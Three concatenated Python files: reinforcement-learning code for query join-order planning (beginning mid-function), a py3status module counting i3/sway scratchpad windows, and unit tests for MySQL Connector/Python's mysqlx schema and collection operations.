    #                 [a[0] for a in actions],
    #                 [a[1] for a in actions]]
    # Encode (row, col) join actions as flat indices row*size + col.
    flat_actions = torch.tensor([a[0]*size + a[1]
                                 for i, a in enumerate(actions)]).view(-1, 1)
    done_mask = torch.tensor(done_mask)
    rewards = torch.tensor(rewards, dtype=torch.float)
    return collate(x), (flat_actions, valid_mask, done_mask, rewards)
class TrajectoryStorage():
    """Accumulates training trajectories reconstructed from finished plans."""

    def __init__(self):
        # Each element is one episode: a list of (obs, target) steps.
        self.episodes = []

    def set_env(self, env):
        """Attach the environment used to encode observations."""
        self.env = env

    def split_trajectory(self, plan, reward):
        """Unwind *plan* join-by-join into per-step (obs, target) samples.

        The final reward and done flag are attached only to the terminal
        step; every earlier step carries done=False and zero reward.
        """
        steps = []
        for step_idx, (node, action) in enumerate(plan._joins[::-1]):
            plan.disjoin(node)
            obs = self.env.get_obs(deepcopy(plan))
            is_last = step_idx == 0
            steps.append([obs, (action, get_mask(plan), is_last, is_last * reward)])
        return steps[::-1]

    def append(self, plan, final_reward):
        """Record one finished plan as a trajectory."""
        self.episodes.append(self.split_trajectory(deepcopy(plan), final_reward))

    def get_dataset(self, n=1000):
        """Get last n trajectories"""
        return self.episodes[-n:]
def ac_loss(pred, actions, valid_mask, done_mask, rewards, gamma):
    """Actor-critic loss: returns (policy_loss, value_loss, entropy_loss).

    pred: (logits, values) as produced by Net.forward.
    actions: flat action indices, shape [Nf, 1] (see collate).
    valid_mask: bool mask of legal (tree, tree) joins.
    done_mask / rewards: per-sample terminal flags and rewards.
    gamma: discount factor for the bootstrapped q-values.
    """
    # [Nf, max(ni), max(ni)], [Nf, 1]
    logits, values = pred
    shape = logits.shape
    # compute qvalues based on rewards and predicted values of the next state
    # NOTE(review): done_mask/rewards appear 1-D while the rolled values are
    # [Nf, 1]; torch.where would then broadcast to [Nf, Nf] and the advantage
    # subtraction below broadcasts again — confirm the intended shapes.
    qvalues = torch.where(done_mask,
                          rewards, gamma * values.detach().roll(-1, 0))
    advantage = (qvalues.view(-1) - values)
    # Mask illegal actions with a large negative logit before normalisation.
    masked_logits = torch.where(valid_mask,
                                logits, -torch.tensor(INF).to(valid_mask.device))
    # [Nf, max(ni), max(ni)]
    log_probs = (masked_logits
                 - masked_logits.logsumexp(dim=[1, 2], keepdim=True))
    log_probs = log_probs.view(shape[0], -1)  # [Nf, max(ni)*max(ni)]
    log_prob_action = torch.gather(log_probs, 1, actions).view(-1, 1)  # [Nf]
    probs = torch.exp(log_probs)  # [Nf, max(ni)*max(ni)]
    # mse
    value_loss = advantage.pow(2).mean()
    # policy grad loss
    policy_loss = -(log_prob_action*advantage.detach()).mean()
    # - entropy
    entropy_loss = torch.sum(log_probs*probs
                             / torch.sum(valid_mask, dim=[1, 2]).view(-1, 1) / shape[0])
    return policy_loss, value_loss, entropy_loss
# def ppo_loss(self, actions, returns, values, logits, old_probs, value_coeff=1., entropy_coef=1.):
# advantage = returns - values # [length, batch_size if != 1]
# # compute log(pi)
# log_probs = torch.log_softmax(logits, dim=-1) # [length, batch_size, n_actions]
# probs = torch.softmax(logits,dim=-1)
# new_probs = probs.gather(-1,actions).squeeze() # [length, batch_size if != 1]
# # compute loss
# value_loss = advantage.pow(2).mean()
# # Clipped version of value loss
# # value_obj = advantage.pow(2)
# # value_obj2 = (returns - old_values + torch.clamp(values-old_values, -self.eps, self.eps)).pow(2)
# # value_loss = torch.mean(torch.max(value_obj,value_obj2))
# entropy = -(log_probs*probs).sum(-1).mean()
# ratio = new_probs/old_probs.detach()
# obj = ratio*advantage.detach()
# obj2 = torch.clamp(ratio, 1-self.eps, 1+self.eps)*advantage.detach()
# clip_loss = torch.mean(torch.min(obj,obj2))
# loss = -clip_loss + value_coeff*value_loss - entropy_coef*entropy
# return loss
#
#
# def ppo_update(self, opt, rollout, next_value, max_grad_norm, batch_part=0.5, epochs=10, **args):
# # loss here is the method of the instance Loss
# obs, rewards, actions, logits, values, probs = rollout.get()
# returns = disc_return(rewards, next_value, 0.95) # [length, batch_size if != 1]
# old_probs = probs.gather(-1, actions).squeeze() # [length, batch_size if != 1]
# sampler = Sampler(int(batch_part),[obs,actions,returns, old_probs.detach()])
# for _ in range(epochs):
# # perform gradient descent for several epochs
# batch_obs, batch_actions, batch_returns, batch_old_probs = sampler.get_next()
# batch_logits, batch_values = self.agent.forward(batch_obs)
# obj = ppo_loss(batch_actions, batch_returns, batch_values.squeeze(), batch_logits, batch_old_probs)
# obj.backward()
# torch.nn.utils.clip_grad_norm_(self.agent.parameters(), max_grad_norm)
# opt.step()
# opt.zero_grad()
# scheduler.step()
class Agent(nn.Module):
    """Couples a policy/value net with sampling (predict) and training (train_net)."""

    def __init__(self, net, collate_fn, eps=1e-2, device='cuda'):
        """
        net: policy/value network; must expose `pretrained_path` and
             `fit_pretrained_layers` attributes.
        collate_fn: turns a list of raw observations into net inputs.
        eps: clipping constant retained for PPO-style objectives.
        device: torch device string the net is moved to.
        """
        super().__init__()
        self.net = net.to(device=device)
        self.collate_fn = collate_fn
        self.device = device
        self.eps = eps
        if self.net.pretrained_path:
            self.net.load_state_dict(torch.load(self.net.pretrained_path))
            if len(self.net.fit_pretrained_layers) > 0:
                # Freeze the whole net, then re-enable gradients only for the
                # explicitly requested layers.
                self.net.requires_grad_(False)
                unfreezing_p = []
                for n, m in self.net.named_parameters():
                    for l in self.net.fit_pretrained_layers:
                        # Fix: raw string so "\." is a literal escaped dot —
                        # the non-raw form raises SyntaxWarning on Python 3.12+.
                        pattern = re.compile(rf"{l}\.|{l}$")
                        if re.match(pattern, n):
                            unfreezing_p.append(n)
                            m.requires_grad_(True)
                LOG.debug(f"Training parameters: {unfreezing_p}")

    def predict(self, inputs, mask):
        """Sample one action per forest from the masked policy distribution.

        Returns (list of (row, col) index pairs, value estimates ndarray).
        """
        # [Nf, max(ni), max(ni)], [Nf, 1]
        logit, values = self.predict_net(self.net, self.collate_fn(inputs))
        dims = logit.shape
        masked_logit = torch.where(mask.view(dims).to(logit.device),
                                   logit, torch.tensor(float("-inf")).to(logit.device))
        # [Nf, max(ni)*max(ni)]
        probs = masked_logit.view(dims[0], -1).softmax(1).cpu().numpy()
        actions = [np.random.choice(len(prob), p=prob) for prob in probs]
        # convert array of flat indices into a tuple of coordinate arrays
        actions = list(zip(*np.unravel_index(actions, dims[1:])))
        return actions, values.cpu().numpy().squeeze()

    def train_net(self, train_data, epochs, criterion, batch_size, lr, scheduler, gamma, value_loss_coef, entropy_loss_coef, weight_decay, clip_grad_norm, betas, val_data=None, val_steps=100, min_iters=1000):
        """Run at least min_iters optimizer steps over train_data.

        criterion is e.g. ac_loss; returns the final (policy, value, entropy)
        loss values as Python floats.
        """
        LOG.info(f"Start training: {time.ctime()}")
        opt = torch.optim.Adam(self.net.parameters(),
                               lr=lr, betas=betas, weight_decay=weight_decay)
        # Gentle decay: lr multiplier is scheduler ** sqrt(step).
        def lambda_lr(epoch): return scheduler ** np.sqrt(epoch)
        sched = torch.optim.lr_scheduler.LambdaLR(opt, lr_lambda=lambda_lr)
        train_dl = torch.utils.data.DataLoader(
            train_data, batch_size=batch_size, drop_last=False, shuffle=True, collate_fn=self.collate_fn, num_workers=0)
        iters = max(min_iters, int(epochs*len(train_dl)))
        di = iter(train_dl)
        for i in range(iters):
            try:
                x_batch, y_batch = next(di)
            except StopIteration:
                # Fix: restart the loader only when exhausted; the previous
                # bare `except:` also swallowed genuine data errors.
                di = iter(train_dl)
                x_batch, y_batch = next(di)
            x_batch, y_batch = to_device(
                x_batch, self.device), to_device(y_batch, self.device)
            pred = self.net(x_batch)
            pg_loss, value_loss, entropy_loss = criterion(
                pred, *y_batch, gamma=gamma)
            (pg_loss + value_loss_coef*value_loss
             + entropy_loss_coef*entropy_loss).backward()
            torch.nn.utils.clip_grad_norm_(
                self.net.parameters(), clip_grad_norm, norm_type=2.0)
            opt.step()
            opt.zero_grad()
            sched.step()
        LOG.info(
            f"""End training: {time.ctime()},
            Policy loss: {pg_loss.item():.2f},
            Value loss: {value_loss.item():.2f},
            Entropy loss {entropy_loss.item():.2f},
            {iters} iterations.""")
        return pg_loss.item(), value_loss.item(), entropy_loss.item()

    def predict_net(self, net, x_batch):
        """Forward pass with *net* in evaluation mode (no grad/dropout)."""
        with evaluation_mode(net):
            x_batch = to_device(x_batch, self.device)
            out = net(x_batch)
        return out
class PolicyGrad():
    """Multiprocess policy-gradient training loop for query planning.

    Worker processes roll out plans episode-by-episode and push completed
    plans onto a queue; the main process consumes them, retrains the agent
    every ``n_update`` episodes, and a dedicated logger process writes
    TensorBoard metrics and checkpoints.
    """

    def __init__(self, agent, env_config, args, train_args, experience=None, baseline_plans=None):
        """
        Args:
            agent: Agent instance (moved to shared memory here).
            env_config: environment configuration dict (mutated in place).
            args: run configuration (worker counts, episode budget, ...).
            train_args: kwargs forwarded to ``agent.train_net``.
            experience: optional initial plan experience (list).
            baseline_plans: optional ``{query: plan}`` baselines.
        """
        # Use None sentinels instead of mutable defaults so instances never
        # share the same list/dict object.
        experience = [] if experience is None else experience
        baseline_plans = {} if baseline_plans is None else baseline_plans
        self.env_config = env_config
        self.train_args = train_args
        self.env_config['return_latency'] = args['latency']
        self.n_workers = args['n_workers']
        self.total_episodes = args['total_episodes']
        self.n_update = args['n_update']
        self.n_train_episodes = args['n_train_episodes']
        self.gamma = args['gamma']
        self.sync = args['sync']
        self.num_complete_plans = args['num_complete_plans']
        self.save_explored_plans = args['save_explored_plans']
        self.traj_storage = TrajectoryStorage()
        self.experience = PlanExperience(experience, add_sub_plans=False)
        self.agent = agent.share_memory()
        self.agent.eps = args['eps']
        # Shared state used to coordinate the worker processes.
        self.step = mp.Value('i', 0)
        self.episode = mp.Value('i', 0)
        self.n_queries = len(env_config['db_data'])
        self.query_ids = mp.Array('i', list(range(self.n_queries)))
        self.update_q = mp.Queue()
        self.step_flag = mp.Event()
        self.baseline_plans = baseline_plans  # {query : plan, ...}
        self.logdir = args['logdir']
        self.cost_func = cost_function[args['cost_func']]
        self.env_config['selectivity'] = args['selectivity']
        self.log_q = mp.Queue()
        encoding = args.get('encoding', 'neo')
        if encoding == 'neo':
            self.env_plan = EnvPlan
        elif encoding == 'rtos':
            self.env_plan = EnvPlanHeapRTOS
        elif encoding == 'neo_pgdata':
            self.env_plan = EnvPlanHeapWithPGdata
        else:
            raise Exception(
                'Wrong encoding name in config. '
                f'Provided "{encoding}" but allowed only "neo" or "rtos"'
            )
        if self.env_config['selectivity']:
            DataBaseEnv_QueryEncoding.compute_cardinalities(self.env_config)

    def run(self):
        """Start logger and worker processes, then run updates in-process."""
        runners = [mp.Process(target=self.runner_process, daemon=True)
                   for _ in range(self.n_workers)]
        logger = mp.Process(target=self.logger, daemon=True)
        logger.start()
        LOG.info('Summary writer started.')
        for r in runners:
            r.start()
        # The update loop runs in the current (main) process.
        self.update_process()

    def logger(self):
        """Consume log records from ``log_q`` and write TensorBoard scalars.

        Two record shapes arrive on the queue: 2-tuples with training losses
        (also trigger a checkpoint save) and 7-tuples with cost statistics.
        """
        writer = SummaryWriter(self.logdir)
        while self.episode.value < self.total_episodes * self.n_queries:
            r = self.log_q.get()
            if len(r) == 2:
                losses, ep = r
                pg_loss, value_loss, entropy_loss = losses
                writer.add_scalar('Loss/policy_loss', pg_loss, ep)
                writer.add_scalar('Loss/value_loss', value_loss, ep)
                writer.add_scalar('Loss/entropy_loss', entropy_loss, ep)
                torch.save(self.agent.net.state_dict(),
                           Path(self.logdir) / 'state_dict.pt')
            else:
                (n_plans, n_subplans), best_found_costs, generated_costs, baseline_costs, reward, step, episode = r
                writer.add_scalar(
                    'Experience size/complete unique plans', n_plans, episode)
                writer.add_scalar(
                    'Rewards', reward, step)
                for stat_type, costs in (('best_found', best_found_costs), ('generated', generated_costs)):
                    # Only log averages once every query has a cost entry.
                    if costs.keys() >= self.env_config['db_data'].keys():
                        writer.add_scalar(f"Cost/{stat_type}/avg_cost:episode",
                                          np.mean(list(costs.values())), episode)
                        if baseline_costs.keys() >= costs.keys():
                            average_ratio = np.mean(
                                [costs[q]/baseline_costs[q] for q in costs])
                            writer.add_scalar(
                                f'Cost/{stat_type}/avg_baseline_ratio:episode', average_ratio, episode)
                            writer.add_scalar(
                                f'Cost/{stat_type}/avg_baseline_ratio:experience', average_ratio, n_plans)

    def runner_process(self):
        """Worker loop: roll out one plan step per iteration.

        Episodes cycle through all queries (shuffled once per pass); when
        ``sync`` is set, workers pause on ``step_flag`` while the main
        process retrains the agent.  Completed plans are pushed to
        ``update_q``.
        """
        env = self.env_plan(self.env_config)
        is_done = True
        while True:
            if is_done:
                if self.episode.value >= self.total_episodes * self.n_queries:
                    return
                with self.episode.get_lock():
                    if self.episode.value % self.n_update == 0 and self.sync:
                        # Block all workers until the next update finishes.
                        self.step_flag.clear()
                    query_num = self.episode.value % self.n_queries
                    if query_num == 0:
                        np.random.shuffle(self.query_ids)
                    query_idx = self.query_ids[query_num]
                    env.reset(query_idx)
                    self.episode.value += 1
            self.step_flag.wait()
            obs = [env.get_state()]
            mask = get_mask(env.plan)  # [N, max(ni), max(ni)]
            actions, _ = self.agent.predict(obs, mask)
            _, cost, is_done, _ = env.step(actions[0])
            with self.step.get_lock():
                self.step.value += 1
            if is_done:
                self.update_q.put(([env.plan], [cost], env.query_id))

    def update_process(self):
        """Main loop: retrain on stored trajectories, log, and absorb
        completed plans arriving from the workers."""
        env = self.env_plan(self.env_config)
        self.traj_storage.set_env(env)
        # Fixed reward assigned to seeded baseline trajectories.
        BASELINE_REWARD = 0.5
        for p in self.baseline_plans.values():
            self.traj_storage.append(p, BASELINE_REWARD)
        generated_costs = {}
        baseline_costs = {q: self.experience.get_cost(
            p, q) for q, p in self.baseline_plans.items()}
        episode = 0
        while True:
            if episode % self.n_update == 0:
                LOG.info(
                    f"Update started, step: {self.step.value}, episode: {episode}, time: {time.ctime()}")
                if episode == 0:
                    # First update: warm-start on one trajectory per query.
                    data = self.traj_storage.get_dataset(n=self.n_queries)
                else:
                    data = self.traj_storage.get_dataset(
                        n=self.n_train_episodes)
                train_data = data
                val_data = None
                # val_split = max(1, min(self.val_size, int(0.3*len(data))))
                # train_data, val_data = data[:-val_split], data[-val_split:]
                losses = self.agent.train_net(
                    train_data=train_data, val_data=val_data, val_steps=1, criterion=ac_loss, gamma=self.gamma, **self.train_args)
                LOG.info(
                    f"Update ended, step: {self.step.value}, episode: {episode}, time: {time.ctime()}")
                # allow exploring
                self.step_flag.set()
                self.log_q.put((losses, self.step.value))
                # save found plans
                path = Path(self.logdir) / 'plans'
                path.mkdir(parents=True, exist_ok=True)
                best_plans = self.experience.plans_for_queries()
                for q, p in best_plans.items():
                    p.save(path / f"{q}.json")
                LOG.info(
                    f"Best plans after {episode} episodes saved to {str(path)}")
            if (episode >= self.total_episodes * self.n_queries):
                return
            complete_plans, costs, query_id = self.update_q.get()
            for plan, cost in zip(complete_plans, costs):
                # reward = (
                #     baseline_costs[query_id] - cost)/baseline_costs[query_id]
                # Negative log-ratio: positive reward when cheaper than the
                # baseline plan for this query.
                reward = - np.log(cost/baseline_costs[query_id])
                LOG.debug(
                    f"Completed plan for {query_id} query with cost = {cost}, reward = {reward}")
                self.experience.append(plan, cost, query_id)
                self.traj_storage.append(plan, reward)
            # update values for log
            average_generated_cost = self.experience.get_cost(
                complete_plans[0], query_id)
            if average_generated_cost is not None:
                generated_costs[query_id] = average_generated_cost
            baseline_costs[query_id] = self.experience.get_cost(
                self.baseline_plans[query_id], query_id)
            best_found_costs = self.experience.costs_for_queries()
            self.log_q.put((self.experience.size(), best_found_costs,
                            generated_costs, baseline_costs, reward, self.step.value, episode))
            if self.save_explored_plans and episode % (5 * self.n_queries) == 0:
                for i, (p, q) in enumerate(self.experience.complete_plans.keys()):
                    save_path = Path(self.logdir) / 'all_plans' / str(q)
                    save_path.mkdir(parents=True, exist_ok=True)
                    p.save(save_path / f"{i}.json")
            episode += 1

    def generate_plan_beam_search(self, query_id, num=1):
        """Greedily roll out *num* candidate plans for *query_id*.

        Exploration is disabled (``eps = 0``) for deterministic scoring.
        """
        is_done = False
        env = self.env_plan(self.env_config, num, False)
        env.reset(query_id)
        self.agent.eps = 0
        i = 0
        while not is_done:
            # print(len(env.plans), i)
            obs = env.get_states()
            valid_actions = env.valid_actions()
            # BUG FIX: predict() returns (actions, values); the original
            # passed the whole tuple into env.step().  Unpack as the other
            # call sites do (see runner_process).
            actions, _ = self.agent.predict(obs, valid_actions)
            _, _, is_done, _ = env.step(actions)
            i += 1
        return env.plan
def log_cost(a, *args):
    """Logarithmic cost transform; extra positional args are ignored."""
    transformed = np.log(a)
    return transformed
def no_op(a, *args):
    """Identity cost transform: return *a* untouched, ignoring extras."""
    return a
def baseline_ratio_cost(a, baseline, *args):
    """Express cost(s) *a* as a fraction of *baseline* (elementwise)."""
    costs = np.array(a)
    return costs / baseline
def difference_reward(a, baseline, *args):
    """Relative improvement of cost *a* over *baseline*: baseline/a - 1."""
    improvement = baseline / a
    return improvement - 1.
# Registry mapping the config key 'cost_func' to a cost/reward transform;
# each transform takes the raw cost first and ignores surplus arguments.
cost_function = {
    'log': log_cost,
    'no_op': no_op,
    'baseline_ratio': baseline_ratio_cost,
    'difference_reward': difference_reward,
}
|
scratchpad.py | """
Display number of scratchpad windows and urgency hints.
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 5)
format: display format for this module
(default "\u232b [\\?color=scratchpad {scratchpad}]")
thresholds: specify color thresholds to use
(default [(0, "darkgray"), (1, "violet")])
Format placeholders:
{scratchpad} number of scratchpads
{urgent} number of urgent scratchpads
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# hide zero scratchpad
scratchpad {
format = '[\\?not_zero \u232b [\\?color=scratchpad {scratchpad}]]'
}
# hide non-urgent scratchpad
scratchpad {
format = '[\\?not_zero \u232b {urgent}]'
}
# bring up scratchpads on clicks
scratchpad {
on_click 1 = 'scratchpad show'
}
# add more colors
scratchpad {
thresholds = [
(0, "darkgray"), (1, "violet"), (2, "deepskyblue"), (3, "lime"),
(4, "yellow"), (5, "orange"), (6, "red"), (7, "tomato"),
]
}
```
@author shadowprince (counter), cornerman (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
[{'full_text': '\u232b '}, {'full_text': u'0', 'color': '#a9a9a9'}]
violet
[{'full_text': '\u232b '}, {'full_text': u'5', 'color': '#ee82ee'}]
urgent
[{'full_text': '\u232b URGENT 1', 'urgent': True}]
"""
# Error template used when the configured/derived ipc name is unsupported.
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
    """
    Base class for the scratchpad IPC backends: stores the parent module
    and delegates backend-specific initialisation to ``setup``.
    """

    def __init__(self, parent):
        self.parent = parent
        self.setup(parent)
class I3ipc(Ipc):
    """
    i3ipc - an improved python library to control i3wm and sway

    Event-driven backend: keeps the scratchpad counters fresh from window
    events instead of polling.
    """

    def setup(self, parent):
        from threading import Thread
        # Events push updates, so the module never needs a timed refresh.
        self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
        self.scratchpad_data = {"scratchpad": 0, "urgent": 0}
        # Run the i3ipc event loop in a background daemon thread so it
        # cannot block py3status shutdown.
        t = Thread(target=self.start)
        t.daemon = True
        t.start()

    def start(self):
        from i3ipc import Connection
        i3 = Connection()
        # Seed the counters once, then refresh on relevant window events.
        self.update(i3)
        for event in ["window::move", "window::urgent"]:
            i3.on(event, self.update)
        i3.main()

    def update(self, i3, event=None):
        # Count windows parked in the scratchpad and how many are urgent.
        leaves = i3.get_tree().scratchpad().leaves()
        temporary = {
            "ipc": self.parent.ipc,
            "scratchpad": len(leaves),
            "urgent": sum(window.urgent for window in leaves),
        }
        # Only trigger a re-render when something actually changed.
        if self.scratchpad_data != temporary:
            self.scratchpad_data = temporary
            self.parent.py3.update()

    def get_scratchpad_data(self):
        return self.scratchpad_data
class Msg(Ipc):
    """
    i3-msg - send messages to i3 window manager
    swaymsg - send messages to sway window manager

    Polling backend: queries the full window tree on every refresh.
    """

    def setup(self, parent):
        from json import loads

        self.json_loads = loads
        # "i3msg" (dash already stripped by the parent) maps back to the
        # real binary name; swaymsg is used verbatim.
        msg_binary = "i3-msg" if parent.ipc == "i3msg" else parent.ipc
        self.tree_command = [msg_binary, "-t", "get_tree"]

    def get_scratchpad_data(self):
        raw_tree = self.parent.py3.command_output(self.tree_command)
        windows = self.find_scratchpad(self.json_loads(raw_tree)).get(
            "floating_nodes", []
        )
        return {
            "ipc": self.parent.ipc,
            "scratchpad": len(windows),
            "urgent": sum(window["urgent"] for window in windows),
        }

    def find_scratchpad(self, tree):
        """Depth-first search for the ``__i3_scratch`` workspace node."""
        if tree.get("name") == "__i3_scratch":
            return tree
        for node in tree.get("nodes", []):
            found = self.find_scratchpad(node)
            if found:
                return found
        return {}
class Py3status:
    """
    Scratchpad counter module: picks an IPC backend (event-driven i3ipc or
    polling i3-msg/swaymsg) and renders the scratchpad/urgent counts.
    """

    # available configuration parameters
    cache_timeout = 5
    format = "\u232b [\\?color=scratchpad {scratchpad}]"
    thresholds = [(0, "darkgray"), (1, "violet")]

    def post_config_hook(self):
        # ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
        self.ipc = getattr(self, "ipc", "")
        if self.ipc in ["", "i3ipc"]:
            try:
                from i3ipc import Connection  # noqa f401
                self.ipc = "i3ipc"
            except Exception:
                # Auto-detect silently falls through to i3-msg/swaymsg, but
                # an explicit "i3ipc" request must surface the ImportError.
                if self.ipc:
                    raise  # module not found
        # Fall back to the wm's own msg tool (presumably "i3-msg"/"swaymsg"
        # from get_wm_msg — confirm) and strip dashes so "i3-msg" and
        # "i3msg" compare equal.
        self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
        if self.ipc in ["i3ipc"]:
            self.backend = I3ipc(self)
        elif self.ipc in ["i3msg", "swaymsg"]:
            self.backend = Msg(self)
        else:
            raise Exception(STRING_ERROR.format(self.ipc))
        self.thresholds_init = self.py3.get_color_names_list(self.format)

    def scratchpad(self):
        # Pull fresh (or cached, for the event backend) counters, colorize
        # any placeholder that has a configured threshold, and render.
        scratchpad_data = self.backend.get_scratchpad_data()
        for x in self.thresholds_init:
            if x in scratchpad_data:
                self.py3.threshold_get_color(scratchpad_data[x], x)
        response = {
            "cached_until": self.py3.time_in(self.cache_timeout),
            "full_text": self.py3.safe_format(self.format, scratchpad_data),
        }
        if scratchpad_data["urgent"]:
            response["urgent"] = True
        return response
if __name__ == "__main__":
    """
    Run module in test mode.
    """
    from py3status.module_test import module_test
    # Custom format also exercises the {ipc} placeholder so the chosen
    # backend is visible in the test output.
    config = {"format": r"\[{ipc}\] [\?color=scratchpad {scratchpad}]"}
    module_test(Py3status, config=config)
|
test_mysqlx_crud.py | # -*- coding: utf-8 -*-
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Unittests for mysqlx.crud
"""
import gc
import json
import logging
import unittest
import threading
import time
import tests
import mysqlx
LOGGER = logging.getLogger(tests.LOGGER_NAME)
# DDL/DML templates used by the tests below; placeholders are filled with
# backtick-quoted (schema, object[, value]) names via str.format.
_CREATE_TEST_TABLE_QUERY = "CREATE TABLE `{0}`.`{1}` (id INT)"
_INSERT_TEST_TABLE_QUERY = "INSERT INTO `{0}`.`{1}` VALUES ({2})"
_CREATE_TEST_VIEW_QUERY = ("CREATE VIEW `{0}`.`{1}` AS SELECT * "
                           "FROM `{2}`.`{3}`")
_CREATE_VIEW_QUERY = "CREATE VIEW `{0}`.`{1}` AS {2}"
_DROP_TABLE_QUERY = "DROP TABLE IF EXISTS `{0}`.`{1}`"
_DROP_VIEW_QUERY = "DROP VIEW IF EXISTS `{0}`.`{1}`"
_SHOW_INDEXES_QUERY = "SHOW INDEXES FROM `{0}`.`{1}` WHERE Key_name='{2}'"
# Introspects prepared statements owned by the current connection's thread
# via performance_schema.
_PREP_STMT_QUERY = (
    "SELECT p.sql_text, p.count_execute "
    "FROM performance_schema.prepared_statements_instances AS p "
    "JOIN performance_schema.threads AS t ON p.owner_thread_id = t.thread_id "
    "AND t.processlist_id = @@pseudo_thread_id")
def create_view(schema, view_name, defined_as):
    """Create view *view_name* defined by *defined_as* in *schema*.

    Returns the view's Table object (existence-checked).
    """
    session = schema.get_session()
    session.sql(
        _CREATE_VIEW_QUERY.format(schema.name, view_name, defined_as)
    ).execute()
    return schema.get_view(view_name, True)
def drop_table(schema, table_name):
    """Drop *table_name* from *schema*; a missing table is not an error
    (the statement uses IF EXISTS)."""
    stmt = _DROP_TABLE_QUERY.format(schema.name, table_name)
    schema.get_session().sql(stmt).execute()
def drop_view(schema, view_name):
    """Drop *view_name* from *schema*; a missing view is not an error
    (the statement uses IF EXISTS)."""
    stmt = _DROP_VIEW_QUERY.format(schema.name, view_name)
    schema.get_session().sql(stmt).execute()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxDbDocTests(tests.MySQLxTests):
    """Tests for creating, adding and copying mysqlx.DbDoc documents."""

    def setUp(self):
        # Fresh session plus a dedicated test collection for every test.
        self.connect_kwargs = tests.get_mysqlx_config()
        self.schema_name = self.connect_kwargs["schema"]
        self.collection_name = "collection_test"
        try:
            self.session = mysqlx.get_session(self.connect_kwargs)
        except mysqlx.Error as err:
            self.fail("{0}".format(err))
        self.schema = self.session.get_schema(self.schema_name)
        self.collection = self.schema.create_collection(self.collection_name)

    def tearDown(self):
        self.schema.drop_collection(self.collection_name)
        self.session.close()

    def test_dbdoc_creation(self):
        """DbDoc and plain dicts are both insertable; copies may rename _id."""
        doc_1 = mysqlx.DbDoc({"_id": "1", "name": "Fred", "age": 21})
        self.collection.add(doc_1).execute()
        self.assertEqual(1, self.collection.count())
        # Don't allow _id assignment
        self.assertRaises(mysqlx.ProgrammingError,
                          doc_1.__setitem__, "_id", "1")
        doc_2 = {"_id": "2", "name": "Wilma", "age": 33}
        self.collection.add(doc_2).execute()
        self.assertEqual(2, self.collection.count())
        # Copying a DbDoc
        doc_3 = self.collection.find().execute().fetch_one()
        doc_4 = doc_3.copy("new_id")
        self.assertEqual(doc_4["_id"], "new_id")
        self.assertNotEqual(doc_3, doc_4)
        # Copying a DbDoc without _id
        # NOTE(review): doc_6 is never asserted on — copy() without an _id is
        # only smoke-tested here; confirm whether an assertion was intended.
        doc_5 = mysqlx.DbDoc({"name": "Fred", "age": 21})
        doc_6 = doc_5.copy()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxSchemaTests(tests.MySQLxTests):
    """Tests for mysqlx Schema objects: collections, tables, views and
    (on 8.0.19+) JSON schema validation."""

    def setUp(self):
        # One session per test; the schema name comes from the test config.
        self.connect_kwargs = tests.get_mysqlx_config()
        self.schema_name = self.connect_kwargs["schema"]
        try:
            self.session = mysqlx.get_session(self.connect_kwargs)
        except mysqlx.Error as err:
            self.fail("{0}".format(err))
        self.schema = self.session.get_schema(self.schema_name)

    def tearDown(self):
        self.session.close()

    def test_exists_in_database(self):
        """Schema names containing LIKE wildcards (% and _) must be found."""
        # Test with special chars
        schema_name_1 = "myschema%"
        schema_name_2 = "myschema_"
        schema_1 = self.session.create_schema(schema_name_1)
        self.assertTrue(schema_1.exists_in_database())
        schema_2 = self.session.create_schema(schema_name_2)
        self.assertTrue(schema_2.exists_in_database())
        self.session.drop_schema(schema_name_1)
        self.session.drop_schema(schema_name_2)

    def test_get_session(self):
        """A schema hands back its owning session; unknown schemas report
        as absent without raising."""
        session = self.schema.get_session()
        self.assertEqual(session, self.session)
        self.assertTrue(self.schema.exists_in_database())
        bad_schema = self.session.get_schema("boo")
        self.assertFalse(bad_schema.exists_in_database())

    def test_create_collection(self):
        """create_collection honors the reuse flag and rejects bad names."""
        collection_name = "collection_test"
        collection = self.schema.create_collection(collection_name, True)
        self.assertEqual(collection.get_name(), collection_name)
        self.assertTrue(collection.exists_in_database())
        # reusing the existing collection should work
        collection = self.schema.create_collection(collection_name, True)
        self.assertEqual(collection.get_name(), collection_name)
        self.assertTrue(collection.exists_in_database())
        # should get exception if reuse is false and it already exists
        self.assertRaises(mysqlx.ProgrammingError,
                          self.schema.create_collection, collection_name,
                          False)
        # should get exception if using an invalid name
        self.assertRaises(mysqlx.ProgrammingError,
                          self.schema.create_collection, "")
        self.assertRaises(mysqlx.ProgrammingError,
                          self.schema.create_collection, None)
        self.schema.drop_collection(collection_name)

    def test_get_collection(self):
        """get_collection returns a handle whether or not the collection
        exists on the server."""
        collection_name = "collection_test"
        coll = self.schema.get_collection(collection_name)
        self.assertFalse(coll.exists_in_database())
        coll = self.schema.create_collection(collection_name)
        self.assertTrue(coll.exists_in_database())
        self.schema.drop_collection(collection_name)

